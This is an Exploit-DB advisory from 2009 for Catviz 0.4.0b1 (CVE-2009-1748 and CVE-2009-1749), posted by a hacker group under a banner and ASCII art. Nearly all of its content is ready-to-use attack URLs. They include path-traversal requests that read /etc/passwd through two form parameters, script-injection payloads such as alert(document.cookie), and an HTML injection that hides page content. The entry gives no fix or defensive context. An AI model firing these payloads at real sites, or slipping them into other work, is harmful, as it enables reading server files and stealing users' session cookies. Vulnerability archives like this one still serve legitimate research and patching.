catviz 0.4.0b1 - LFI/XSS Multiple Vulnerabilities

2009-05-20T00:00:00
ID EDB-ID:8745
Type exploitdb
Reporter ByALBAYX
Modified 2009-05-20T00:00:00

Description

Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities. CVE-2009-1748,CVE-2009-1749. Webapps exploit for php platform

                                        
                                            @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@
@~~=======================================~~@
@~~=Author   : ByALBAYX                     @
@                                           @
@~~=Website  : WWW.C4TEAM.ORG               @
@                                           @
@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@
@
@              _.--"""""--._
@            .'             '.
@           /                 \
@          ;       C4TEAM      ;
@          |                   |
@          |                   |
@          ;                   ;
@           \ (`'--,    ,--'`) /
@            \ \  _ )  ( _  / /
@             ) )(')/  \(')( (
@            (_ `""` /\ `""` _)
@             \`"-, /  \ ,-"`/
@              `\ / `""` \ /`
@               |/\/\/\/\/\|
@               |\        /|
@               ; |/\/\/\| ;
@                \`-`--`-`/
@                 \      /
@                  ',__,'
@ 
@ Catviz 0.4.0 Beta 1
@ 
@ Demo:
@
@ http://catviz.sourceforge.net
@
@
@ LFI :/
@
@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00
@
@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00
@
@
@
@ XSS :/
@
@
@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>
@
@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>
@
@@@:/

# milw0rm.com [2009-05-20]